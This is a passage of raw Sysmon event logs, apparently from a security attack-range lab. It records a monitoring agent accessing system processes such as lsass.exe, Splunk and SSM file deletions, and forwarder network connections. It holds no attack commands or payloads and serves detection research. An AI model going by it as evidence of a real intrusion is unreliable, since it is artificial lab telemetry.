Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016428Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.561{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016427Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.552{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016426Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.546{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016425Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.538{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016424Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.535{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 23542300x800000000000000016455Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:43.316{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0417B2758536268CC0FBF3418048DA23,SHA256=55442EACA105FEE5918E16E074EFFC4784C5C0DA4B16994B132B7BAF6AFC76A1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000016457Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.125{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50092-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016456Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:44.352{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CEB9F80657CD5B40A88A9F4D9C89B2E,SHA256=BA93FD5782902AB45401D15A35412A09758330515DC37179E6459DE651D28F73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:44.091{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B44FB1584D1A85794F0D9CCC209F4F3D,SHA256=4EFB845409AB48FFE3D507A11C33B22231D135D0D270A4C2C5AD019BBED21030,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016458Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:45.436{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6D5639DF9468BBABB42FB19C74E856C,SHA256=7DE8CC83D8277501AE31BEE7FDA14D8D7910CEB205A8A0E357B78CB0B6324FE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:45.209{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BECAA33468C26A8E2A341FE2820598B6,SHA256=A94CB17F450D166A7EA1DC93406B68AEA036BA862CBD462EBBC5819E6EE2B610,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016459Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:46.525{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C59F33BF5AA6130C63B6BE4BF1A05979,SHA256=6F16D3C1F59D8336F09201CEFBCF6161061ED3808C395FA0E2169D24A35D62B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:46.288{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=033EAA0D4BDDD23A2FFB0D5F463A1726,SHA256=23EDD6269D28317E0CCEF04E0403EAB9B7CC899866C664C8C55309CFB0D3769D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:46.145{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-042MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016460Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:47.627{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06AF3179AA9451E872ABBD38969CC740,SHA256=DC492DF07ED499E836ABAC52AB524F55C236077E70EA161EF543A35961BD2831,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:47.375{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E84BC1D625F07AB6378E6ECDC9602C96,SHA256=01965AC8E7BA3F226A19AF4C26BB2BC70EE345E0D0262475182BCC03840926E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:44.658{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56294-false10.0.1.12-8000- 23542300x800000000000000041777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:47.154{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-043MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016461Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:48.711{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DA5B442FF3027DF91910BF7D5070861,SHA256=E948E398EB8A78E55EB01E8FB845E27EB75C3261A3EC54CAFCD4CC3A16405A8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:48.474{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E65A67D4ACD3E173B8A0FD2759944DC,SHA256=FC0B0432484B244DCB11BECFBEE1939D12C27399079B2B3366478080B63DFBB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016462Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:49.796{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6510340026A081FB1BE4F1D1A6F885E8,SHA256=00A8F9DB90A9BDB7A54E80CA0E4E4ACC235965497D31787F5DE522999A2DC62E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:49.569{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D67D11489D1CFA40588D6A091F30C8E8,SHA256=79D05B93EEF2B2BA5A1507ADAC5DE8304E19DFEF9E581E95E1B3DD87F548B4D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016464Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:50.885{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=461F357F2DA9F0890A216C977255A8B9,SHA256=C337D1D1182E57F1072148F7A4BB16ABA7A90FD89CCFABE160C9425C3CB01444,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:50.679{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2778F837FD797ED05813A8BC2B7E9201,SHA256=11B886F1D01DDAD0B5FF9148C4AF06C808017F0A605F9AAB2BC1F9C584DC5EF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016463Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:47.938{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50093-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016465Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:51.956{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=539901E95654997F570653D709C9FA25,SHA256=0BAE4C535F12054877DCFFBEC9FE007671E3161FEF3767A38299AF1C2275DB66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.961{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=132244F44890F9C2E66E21D1F5FA6FF7,SHA256=8082565C367288E1C14EFE30E9D025F344F552CE1622595EE57F7F88E07E6826,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.960{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_q4lXu7ZmtmYrVJJMD5=A190DE89515B54720CB45E42C6BB7AB7,SHA256=C6E16BDA3166E2889E4BCEDFF3BE36C8B8C0D15E0A158AC2753878641FF1A071,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.949{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=E19F6F0646C97AFC11ED67E2FCDCE4C7,SHA256=C3CD482D7ED409FD5AC8C89BE8F28FD94B2089A98AF831C9E42BCA3E3BA28E4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.941{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.939{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.935{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.933{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.930{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.920{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.914{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.908{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.904{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.902{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.900{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program 